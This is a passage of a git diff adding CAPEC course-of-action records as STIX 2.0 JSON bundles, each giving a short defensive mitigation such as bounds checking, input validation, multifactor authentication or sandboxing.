"bundle", + "id": "bundle--606081c2-f7f3-4060-b383-edb92da24866", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--69eb9c90-2ae5-4bab-aca8-b86865b9f811", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-103-2", + "description": "When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--6a4ada4e-5df9-4d9e-814b-230bdb0637c8.json b/capec/course-of-action/course-of-action--6a4ada4e-5df9-4d9e-814b-230bdb0637c8.json new file mode 100644 index 0000000000..066c0354be --- /dev/null +++ b/capec/course-of-action/course-of-action--6a4ada4e-5df9-4d9e-814b-230bdb0637c8.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8fc70b3f-9c76-4f0e-8b7c-eb34544a7142", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--6a4ada4e-5df9-4d9e-814b-230bdb0637c8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-182-1", + "description": "Implementation: use validation on both client and server side.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--6ae26425-77bb-4201-b54d-b1a2a82e7639.json b/capec/course-of-action/course-of-action--6ae26425-77bb-4201-b54d-b1a2a82e7639.json new file mode 100644 index 0000000000..e5a4e687fd --- /dev/null +++ b/capec/course-of-action/course-of-action--6ae26425-77bb-4201-b54d-b1a2a82e7639.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--0621e721-f275-4c42-b162-cceafb64e035", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--6ae26425-77bb-4201-b54d-b1a2a82e7639", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-27-1", + "description": "Access to the directories should be restricted as to prevent attackers from manipulating the files. Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--6b986b64-a6e5-4076-ab82-cb2088416c02.json b/capec/course-of-action/course-of-action--6b986b64-a6e5-4076-ab82-cb2088416c02.json new file mode 100644 index 0000000000..a29d2cf4a1 --- /dev/null +++ b/capec/course-of-action/course-of-action--6b986b64-a6e5-4076-ab82-cb2088416c02.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--be0e1f3d-3ea1-4096-a6e1-cd247213ca3d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--6b986b64-a6e5-4076-ab82-cb2088416c02", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-170-3", + "description": "Implementation: Hide URL file extension.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--6c587fe5-89a0-42b2-a2ff-ef9b15773cf7.json b/capec/course-of-action/course-of-action--6c587fe5-89a0-42b2-a2ff-ef9b15773cf7.json new file mode 100644 index 0000000000..a0492ba493 --- /dev/null +++ b/capec/course-of-action/course-of-action--6c587fe5-89a0-42b2-a2ff-ef9b15773cf7.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--2a5e2fb2-2826-46ba-82de-9cdd0e251190", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--6c587fe5-89a0-42b2-a2ff-ef9b15773cf7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-126-8", + "description": "Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--6cc43be3-26c7-4a02-93c6-bd3346e0758c.json b/capec/course-of-action/course-of-action--6cc43be3-26c7-4a02-93c6-bd3346e0758c.json new file mode 100644 index 0000000000..3630a87073 --- /dev/null +++ b/capec/course-of-action/course-of-action--6cc43be3-26c7-4a02-93c6-bd3346e0758c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--459986c7-d436-40ae-8432-099712387706", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--6cc43be3-26c7-4a02-93c6-bd3346e0758c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-613-0", + "description": "Do not enable the feature of \"Hidden SSIDs\" (also known as \"Network Cloaking\") \u2013 this option disables the usual broadcasting of the SSID by the access point, but forces the mobile handset to send requests on all supported radio channels which contains the SSID. The result is that tracking of the mobile device becomes easier since it is transmitting the SSID more frequently.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--6dc1b356-ef19-4ed1-8a64-65470da45dca.json b/capec/course-of-action/course-of-action--6dc1b356-ef19-4ed1-8a64-65470da45dca.json new file mode 100644 index 0000000000..5f02919aa9 --- /dev/null +++ b/capec/course-of-action/course-of-action--6dc1b356-ef19-4ed1-8a64-65470da45dca.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ca2c879d-86b1-482c-9e6e-7dc6b73020d3", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--6dc1b356-ef19-4ed1-8a64-65470da45dca", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-625-1", + "description": "Frequent changes to secret keys and certificates.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--6e910b7b-38fd-4006-9c1d-774f37ee57cf.json b/capec/course-of-action/course-of-action--6e910b7b-38fd-4006-9c1d-774f37ee57cf.json new file mode 100644 index 0000000000..1e1aed9754 --- /dev/null +++ b/capec/course-of-action/course-of-action--6e910b7b-38fd-4006-9c1d-774f37ee57cf.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--5b88d700-d8ea-4af6-abd9-0e71e2667561", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--6e910b7b-38fd-4006-9c1d-774f37ee57cf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-100-0", + "description": "Use a language or compiler that performs automatic bounds checking.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--6f3c5c84-4c2d-44ad-98eb-f4b8bdc4a460.json b/capec/course-of-action/course-of-action--6f3c5c84-4c2d-44ad-98eb-f4b8bdc4a460.json new file mode 100644 index 0000000000..16a9ececfc --- /dev/null +++ b/capec/course-of-action/course-of-action--6f3c5c84-4c2d-44ad-98eb-f4b8bdc4a460.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--97ba5876-ca6e-49b6-9b00-9f6e8f5b89b7", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--6f3c5c84-4c2d-44ad-98eb-f4b8bdc4a460", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-230-2", + "description": "Pick a robust implementation of an XML parser.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--6f4e1572-df35-40cd-bd86-f6ab98fb5009.json b/capec/course-of-action/course-of-action--6f4e1572-df35-40cd-bd86-f6ab98fb5009.json new file mode 100644 index 0000000000..10b939357b --- /dev/null +++ b/capec/course-of-action/course-of-action--6f4e1572-df35-40cd-bd86-f6ab98fb5009.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--512631a9-e0b9-44fe-8af1-47a893923889", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--6f4e1572-df35-40cd-bd86-f6ab98fb5009", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-59-3", + "description": "Ideas for creating random numbers are offered by Eastlake [RFC1750]", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--6f996c4c-d4ef-471a-9766-e81b471238e4.json b/capec/course-of-action/course-of-action--6f996c4c-d4ef-471a-9766-e81b471238e4.json new file mode 100644 index 0000000000..38b5d15c89 --- /dev/null +++ b/capec/course-of-action/course-of-action--6f996c4c-d4ef-471a-9766-e81b471238e4.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--adf4fb6c-875a-462a-af87-4c69eab821e3", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--6f996c4c-d4ef-471a-9766-e81b471238e4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-62-2", + "description": "Additionally, the user can also be prompted to confirm an action every time an action concerning potentially sensitive data is invoked. This way, even if the attacker manages to get the user to click on a malicious link and request the desired action, the user has a chance to recover by denying confirmation. This solution is also implicitly tied to using a second factor of authentication before performing such actions.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7052d162-d901-485b-9a23-2eee96a9717f.json b/capec/course-of-action/course-of-action--7052d162-d901-485b-9a23-2eee96a9717f.json new file mode 100644 index 0000000000..2014888157 --- /dev/null +++ b/capec/course-of-action/course-of-action--7052d162-d901-485b-9a23-2eee96a9717f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f44d9793-cfa2-41e1-bf8f-789233cb7e53", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7052d162-d901-485b-9a23-2eee96a9717f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-16-1", + "description": "Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-02.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--705bc137-3094-4299-b3e3-0a101390f074.json b/capec/course-of-action/course-of-action--705bc137-3094-4299-b3e3-0a101390f074.json new file mode 100644 index 0000000000..8ccd06e042 --- /dev/null +++ b/capec/course-of-action/course-of-action--705bc137-3094-4299-b3e3-0a101390f074.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3ea4e2ea-fa46-4f89-abb5-6e4cb2be91e0", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--705bc137-3094-4299-b3e3-0a101390f074", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "name": "coa-44-0", + "description": "Perform appropriate bounds checking on all buffers.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--70808a24-58bf-45de-aaaf-1fc1cc949937.json b/capec/course-of-action/course-of-action--70808a24-58bf-45de-aaaf-1fc1cc949937.json new file mode 100644 index 0000000000..dff272d95a --- /dev/null +++ b/capec/course-of-action/course-of-action--70808a24-58bf-45de-aaaf-1fc1cc949937.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--918cc2db-4810-41e6-8c61-31726f7b9b32", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--70808a24-58bf-45de-aaaf-1fc1cc949937", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-41-0", + "description": "Design: Perform validation on email header data", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--718c4c5a-471a-4ff2-8fc4-c9cbdaedc15f.json b/capec/course-of-action/course-of-action--718c4c5a-471a-4ff2-8fc4-c9cbdaedc15f.json new file mode 100644 index 0000000000..f30d3ddeea --- /dev/null +++ b/capec/course-of-action/course-of-action--718c4c5a-471a-4ff2-8fc4-c9cbdaedc15f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d42e5dc6-a73b-4f8f-818d-657ebeb939c3", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--718c4c5a-471a-4ff2-8fc4-c9cbdaedc15f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-10-3", + "description": "There are tools such as Sharefuzz [R.10.3] which is an environment variable fuzzer for Unix that support loading a shared library. You can use Sharefuzz to determine if you are exposing an environment variable vulnerable to buffer overflow.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7195cb36-22ea-4d06-93e2-5ce46840220b.json b/capec/course-of-action/course-of-action--7195cb36-22ea-4d06-93e2-5ce46840220b.json new file mode 100644 index 0000000000..d36020e623 --- /dev/null +++ b/capec/course-of-action/course-of-action--7195cb36-22ea-4d06-93e2-5ce46840220b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4568a022-3291-4f43-95ee-06578bf7b6f5", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7195cb36-22ea-4d06-93e2-5ce46840220b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-222-0", + "description": "Configuration: Disable iFrames in the Web browser.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--71e1e7e8-78ad-407e-9824-3aaeb49440eb.json b/capec/course-of-action/course-of-action--71e1e7e8-78ad-407e-9824-3aaeb49440eb.json new file mode 100644 index 0000000000..145bd75b45 --- /dev/null +++ b/capec/course-of-action/course-of-action--71e1e7e8-78ad-407e-9824-3aaeb49440eb.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--49a6163c-fc8e-42d7-a186-425965b3afcc", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--71e1e7e8-78ad-407e-9824-3aaeb49440eb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-130-0", + "description": "Limit the amount of resources that are accessible to unprivileged users.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--724cd67d-adc8-4f12-a881-cd350980aec9.json b/capec/course-of-action/course-of-action--724cd67d-adc8-4f12-a881-cd350980aec9.json new file mode 100644 index 0000000000..2ba8157458 --- /dev/null +++ b/capec/course-of-action/course-of-action--724cd67d-adc8-4f12-a881-cd350980aec9.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--a0460ae1-e268-442b-acfe-ea049213b385", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--724cd67d-adc8-4f12-a881-cd350980aec9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-69-7", + "description": "Check your program for buffer overflow and format String vulnerabilities which can lead to execution of malicious code.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--72dd2acb-8073-41ff-96fb-770cfa9e5583.json b/capec/course-of-action/course-of-action--72dd2acb-8073-41ff-96fb-770cfa9e5583.json new file mode 100644 index 0000000000..e0ed607650 --- /dev/null +++ b/capec/course-of-action/course-of-action--72dd2acb-8073-41ff-96fb-770cfa9e5583.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3670396f-63c2-4731-8d3b-392c219bf2e8", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--72dd2acb-8073-41ff-96fb-770cfa9e5583", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-95-4", + "description": "Validate the received messages against the WSDL Schema. Incomplete solution.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7352da80-8df6-4540-bcaa-0b02c967b0a6.json b/capec/course-of-action/course-of-action--7352da80-8df6-4540-bcaa-0b02c967b0a6.json new file mode 100644 index 0000000000..db15ef64f2 --- /dev/null +++ b/capec/course-of-action/course-of-action--7352da80-8df6-4540-bcaa-0b02c967b0a6.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4ee55a83-4526-4533-83a6-108932619795", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7352da80-8df6-4540-bcaa-0b02c967b0a6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-104-0", + "description": "Disable script execution.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--737b495b-88cf-4045-81ad-c988de02409e.json b/capec/course-of-action/course-of-action--737b495b-88cf-4045-81ad-c988de02409e.json new file mode 100644 index 0000000000..742f97433a --- /dev/null +++ b/capec/course-of-action/course-of-action--737b495b-88cf-4045-81ad-c988de02409e.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--350ec528-65d1-4ea6-9f8a-4fae4be92c1c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--737b495b-88cf-4045-81ad-c988de02409e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-131-1", + "description": "Memory should always be allocated/freed using matching functions (e.g., malloc/free, new/delete, etc.)", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--744bb010-978a-4e8c-804f-164adb0bf938.json b/capec/course-of-action/course-of-action--744bb010-978a-4e8c-804f-164adb0bf938.json new file mode 100644 index 0000000000..55d3374ca4 --- /dev/null +++ b/capec/course-of-action/course-of-action--744bb010-978a-4e8c-804f-164adb0bf938.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--503927f2-2a85-4512-9856-24323ba7a7c2", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--744bb010-978a-4e8c-804f-164adb0bf938", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-45-2", + "description": "Pay attention to the resource pointed to by your symlink links (See attack pattern named \"Forced Symlink race\"), they can be replaced by malicious resources.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--75a293b0-31ff-46d1-8a2c-c0c9b3ff4d90.json b/capec/course-of-action/course-of-action--75a293b0-31ff-46d1-8a2c-c0c9b3ff4d90.json new file mode 100644 index 0000000000..c3c8cabf72 --- /dev/null +++ b/capec/course-of-action/course-of-action--75a293b0-31ff-46d1-8a2c-c0c9b3ff4d90.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4c4f2f69-0a4b-4a9c-83e0-e8affa43375c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--75a293b0-31ff-46d1-8a2c-c0c9b3ff4d90", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-74-0", + "description": "Do not rely solely on user-controllable locations, such as cookies or URL parameters, to maintain user state.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--75cfbaa2-4ebd-4bd2-8bcd-1cc9bb5c18f6.json b/capec/course-of-action/course-of-action--75cfbaa2-4ebd-4bd2-8bcd-1cc9bb5c18f6.json new file mode 100644 index 0000000000..96a97c3ba4 --- /dev/null +++ b/capec/course-of-action/course-of-action--75cfbaa2-4ebd-4bd2-8bcd-1cc9bb5c18f6.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--cd8fe16f-836a-4565-aa01-f69691b02439", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--75cfbaa2-4ebd-4bd2-8bcd-1cc9bb5c18f6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-237-2", + "description": "Assurance: Use static analysis tool to do code review and dynamic tool to do penetration test on the standard library.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--766199a6-728f-4772-9a27-191e5f8a072e.json b/capec/course-of-action/course-of-action--766199a6-728f-4772-9a27-191e5f8a072e.json new file mode 100644 index 0000000000..abb73d366e --- /dev/null +++ b/capec/course-of-action/course-of-action--766199a6-728f-4772-9a27-191e5f8a072e.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--a4b4d6d8-acd0-443d-b0e5-77d5d77c57b4", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--766199a6-728f-4772-9a27-191e5f8a072e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-624-0", + "description": "Implement robust physical security countermeasures and monitoring.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--767f4e01-7e92-4db1-84d7-851067a97406.json b/capec/course-of-action/course-of-action--767f4e01-7e92-4db1-84d7-851067a97406.json new file mode 100644 index 0000000000..2c6a68a6c4 --- /dev/null +++ b/capec/course-of-action/course-of-action--767f4e01-7e92-4db1-84d7-851067a97406.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--2659a0c7-0664-4372-99c8-8bc2d1d34fb7", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--767f4e01-7e92-4db1-84d7-851067a97406", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-60-5", + "description": "Use multifactor authentication.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--76adf409-ce96-41bf-8ec8-bf4527b29b32.json b/capec/course-of-action/course-of-action--76adf409-ce96-41bf-8ec8-bf4527b29b32.json new file mode 100644 index 0000000000..a03f9c7851 --- /dev/null +++ b/capec/course-of-action/course-of-action--76adf409-ce96-41bf-8ec8-bf4527b29b32.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--57b4c121-6d10-40fd-b323-5d9d27f0f3ad", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--76adf409-ce96-41bf-8ec8-bf4527b29b32", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-630-1", + "description": "Purchase potential TypoSquatted domains and forward to legitimate domain.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--76fd685c-7ff0-4dcf-98bd-9f3317f37a1f.json b/capec/course-of-action/course-of-action--76fd685c-7ff0-4dcf-98bd-9f3317f37a1f.json new file mode 100644 index 0000000000..737580c27b --- /dev/null +++ b/capec/course-of-action/course-of-action--76fd685c-7ff0-4dcf-98bd-9f3317f37a1f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--166a2514-c143-4507-8441-5cc43bb39216", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--76fd685c-7ff0-4dcf-98bd-9f3317f37a1f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-97-1", + "description": "\n Ensure that the algorithms are used properly. That means:\n \n \n 1. Not rolling out your own crypto; Use proven algorithms and implementations.\n 2. Choosing initialization vectors with sufficiently random numbers\n 3. Generating key material using good sources of randomness and avoiding known weak keys\n 4. Using proven protocols and their implementations.\n 5. Picking the most appropriate cryptographic algorithm for your usage context and data\n \n \n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7757d6cb-1ca1-443a-acc2-0e56d96742ee.json b/capec/course-of-action/course-of-action--7757d6cb-1ca1-443a-acc2-0e56d96742ee.json new file mode 100644 index 0000000000..d7f4329328 --- /dev/null +++ b/capec/course-of-action/course-of-action--7757d6cb-1ca1-443a-acc2-0e56d96742ee.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d53745eb-33a3-4cc8-8eb0-3e8d35bfdbb4", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--7757d6cb-1ca1-443a-acc2-0e56d96742ee", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-69-6", + "description": "If possible use a sandbox model which limits the actions that programs can take. A sandbox restricts a program to a set of privileges and commands that make it difficult or impossible for the program to cause any damage.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--7766bca9-c0e5-45bf-9e34-c8b1d3df00a1.json b/capec/course-of-action/course-of-action--7766bca9-c0e5-45bf-9e34-c8b1d3df00a1.json new file mode 100644 index 0000000000..63fe723986 --- /dev/null +++ b/capec/course-of-action/course-of-action--7766bca9-c0e5-45bf-9e34-c8b1d3df00a1.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": 